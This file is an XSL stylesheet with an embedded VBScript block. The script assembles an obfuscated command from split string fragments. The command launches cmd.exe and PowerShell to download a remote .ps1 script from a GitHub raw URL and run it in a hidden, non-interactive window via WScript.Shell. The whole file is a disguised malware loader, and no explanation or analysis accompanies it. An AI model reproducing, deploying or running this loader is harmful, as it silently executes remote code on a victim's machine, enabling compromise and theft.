<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="VBScript">
    <![CDATA[
    dim str1,str2,str3,str4,str5,str6,str7,str8,str9
    str1 = "cm"
    str2 = "d.exe /c pow"
    str3 = "ershell irm https://raw.gi"
    str4 = "thubusercontent.com/joes233f/ccc/main/c.ps1|powe"
    str5 = "rshell -noLOGo -WindowS"
    str6 = "tyle Hidde"
    str7 = "n -NoExi"
    str8 = "t -NoProfile -NonInteractive"
    str9 = str1+str2+str3+str4+str5+str6+str7+str8+str9
    set os = CreateObject("WScript.Shell")
    os.Run str9, 0, false
    ]]> </ms:script>
</stylesheet>
